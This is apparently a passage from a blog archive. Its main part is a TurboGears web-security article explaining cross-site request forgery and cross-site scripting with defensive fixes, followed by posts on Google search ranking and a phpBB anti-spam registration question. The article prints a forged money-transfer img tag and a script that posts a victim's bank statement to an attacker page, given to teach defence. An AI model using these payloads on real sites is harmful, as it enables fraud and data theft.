            amount=float(how_much))
        turbogears.redirect('/')

The bank site using this application might contain a page with a “send money” form, where the user fills in information such as to whom he is transferring the money and how much money he is transferring. Everything’s fine and dandy there. But what if the user is connected to the bank site, and in another browser tab, he is simultaneously browsing a malicious site, one that contains the following img tag?

<img src="http://www.tgbank.com/send_money?
       to_whom=thesamet&amp;how_much=0.04"
width="0">

Then the user’s browser will trigger that operation on behalf of the unsuspecting and innocent Web visitor. And because it’s such an inconsequential amount, he probably won’t even bother to check on those four cents.

Allowing only POST requests to go into send_money() will not help the matter. That’s because it is easy to send POST requests using JavaScript. On the other hand, checking that the HTTP Referer header of the request is within one’s domain is too restrictive. That’s because many browsers often do not send this header.

A possible solution is to add a hidden field that only your application can generate and validate. For example, the application might process the request only if it received a query argument whose value is a sha1 digest of a string composed of the user id and a secret word. This value can be easily validated by your application, but it will be hard for a malicious site to generate.
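
One way this could look in Python is sketched below. Note the assumptions: instead of hashing a plain concatenation, it uses HMAC-SHA1 from the standard library, which is a keyed variant of the same idea, and the names SECRET, make_token and is_valid_token are made up for this example.

```python
import hashlib
import hmac

# Hypothetical secret word; keep the real one out of your source tree.
SECRET = b"change-me"


def make_token(user_id):
    """Return the value to put in the hidden form field for this user."""
    message = str(user_id).encode("utf-8")
    return hmac.new(SECRET, message, hashlib.sha1).hexdigest()


def is_valid_token(user_id, token):
    """Check the token that came back with the request."""
    expected = make_token(user_id).encode("utf-8")
    # compare_digest avoids leaking information through timing.
    return hmac.compare_digest(expected, token.encode("utf-8"))


token = make_token(42)
print(is_valid_token(42, token))   # True
print(is_valid_token(43, token))   # False: token belongs to another user
```

In send_money() you would then refuse to transfer anything unless is_valid_token() accepts the submitted value for the currently logged-in user.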

Utterly Ridiculous!—More XSRF: Stealing Information with Scriptaculous

In addition to doing serious damage, this type of attack can be used to steal information. Suppose the bank application previously mentioned has a URL that returns Javascript code that defines a list with your monthly statement (list of expenses). It may be used on the bank site for doing client side sorting. A malicious site might contain something like this:

<script src="http://www.tgbank.com/monthly_statement.js" type="text/javascript"></script>
<script type="text/javascript">
    function send_data_to_the_criminal() {
        /* code that converts the statement
            object to string goes here */
        new Ajax.Request('/collect_other_people_data.php',
                {method: 'post', postBody: 'data=' + statement});
    }
window.onload = send_data_to_the_criminal;
</script>

Here, that dastardly attacker placed code on his site that executes the monthly statement script from the bank’s site. Once that script is executed, we have an object named statement containing a list of monthly expenses. Then, after the document has finished loading, it is transmitted right into the waiting attacker’s hands.

Recently, an XSRF flaw was discovered (and fixed) in GMail. This vulnerability allowed an attacker to steal the user’s contact list precisely as just mentioned.

Assault–Take Two! XSS: Cross-Site Scripting

A cross-site scripting vulnerability occurs when a Web application generates output that contains user-supplied data without HTML encoding. For example, if we allow a post in a forum to contain HTML tags, then we can use KID to display it:

    <div>
        ${XML(forum_post.body)}
    </div>

Raising the ax yet again, a vile attacker can embed javascript code into his post. Then, when an innocent user visits the page, his or her browser runs the script, unbeknownst to him or her. This script can, for example, send the contents of the page back to the attacker. It might also post a comment to a blog, in the unsuspecting user’s name, or make new friends for him or her in MySpace.

If we do not use the XML() function in KID, then HTML entities are escaped and we are safe. The users will see just the script text and the browser will not interpret it as code. That said, if XML() is to be used, then it is suggested that you check whether the string contains '<script' (case insensitive) before actually sending it. You should also beware of spaces between the word script and its surrounding < and >, although I haven’t tested which browsers allow it. Note that most HTML elements allow attributes that can contain JavaScript code, like onmouseover or onclick. The safest thing would be to escape every < as &lt; (Python has a cgi.escape function for this). If HTML tags are to be allowed, then the application should carefully check that they contain only permitted attributes. The href attribute of every <a> tag should also be checked, to make sure it does not contain something like “javascript:do_something()”. That way, those malicious attackers can be forced to drop their weapons before they have time to draw them.
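
The two checks can be sketched as follows. This is an illustration only, written for current Python versions, where html.escape does the job that cgi.escape did; the function name is_safe_href and the decision to accept only absolute http and https links (so relative links are rejected too) are assumptions of this sketch.

```python
from html import escape
from urllib.parse import urlparse

# Only links with one of these schemes are accepted.
ALLOWED_SCHEMES = ("http", "https")


def is_safe_href(url):
    """Accept a link only if its scheme is on the allow-list."""
    scheme = urlparse(url.strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES


post_body = '<script>alert("gotcha")</script>'
# Escaped text is displayed to the reader instead of being executed.
print(escape(post_body))

print(is_safe_href("http://example.com/"))
print(is_safe_href("javascript:do_something()"))
```

Checking against a list of allowed schemes is usually more robust than searching for the word javascript, since there are many ways to disguise it.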

Now that you’ve learned how to preempt attacks before they strike, you’re well on your way to a more enjoyable Web application development experience. Comments and questions about the strategies outlined here are welcome. We also encourage you to share how you’ve successfully waged war against security attackers.

Sometimes Google does strange things.

I was told today that this blog shows up on the first page of search results for the term “בלוג” (which is blog spelled in Hebrew). Here is a screenshot for the lazy disbelievers (taken on December 23, 2006):

search results for בלוג in google

Hmm. I thought it should be hard to get on the front page of Google for such a broad term, especially if you do nothing (intentionally, at least) to make it happen.

So at least for the time being, this blog receives tons of highly un-targeted traffic. Any ideas on how to monetize this? :)

I am running several phpBB-based forums, and they all started receiving serious amounts of spam recently. It seems that the spammers are now able to break the captcha in the registration and even pass the e-mail activation. I found a very simple solution for this. And from that moment on - the spam stopped.

The idea is to ask the spam bot a question which it does not expect, but it will be no problem for the users to answer. I’ve added to the registration form the question “How much is 5+2 ?”. Most of the new forum members were able to answer it on the first attempt. But spam bots had no clue.

So until someone bothers to write a spam bot specifically for my forums - I am okay. When it happens, I’ll just change the question. It can be many things: “What was the color of the white horse of Hammurabi?” or “How long did the six-day war last?” and so on. You get the point.

Here is how to do it.

In the template directory, edit profile_add_body.tpl, and add a new row to the form:

<tr>
    <td class="row1"><span class="gen">How much is 5+2 *</span></td>
    <td class="row2">
        <input type="text" class="post" style="width: 200px" name="math_question" size="6" maxlength="6" value="" />
    </td>
</tr>

Browse to the registration page on your forum to see that it looks right.

In includes/usercp_register.php, look around line 260, and add the condition that checks if the question was answered properly:

    else if ( $mode == 'register' )
    {
        if ( empty($username) || empty($new_password) || empty($password_confirm) || empty($email) )
        {
            $error = TRUE;
            $error_msg .= ( ( isset($error_msg) ) ? '<br />' : '' ) . $lang['Fields_empty'];
        }

        // Reject the registration unless the question was answered with 7.
        if (!isset($_POST['math_question']) || $_POST['math_question'] != '7') {
            $error = TRUE;
            $error_msg .= (isset($error_msg) ? '<br />' : '') . "Incorrect answer to the mathematical question…";
        }
    }
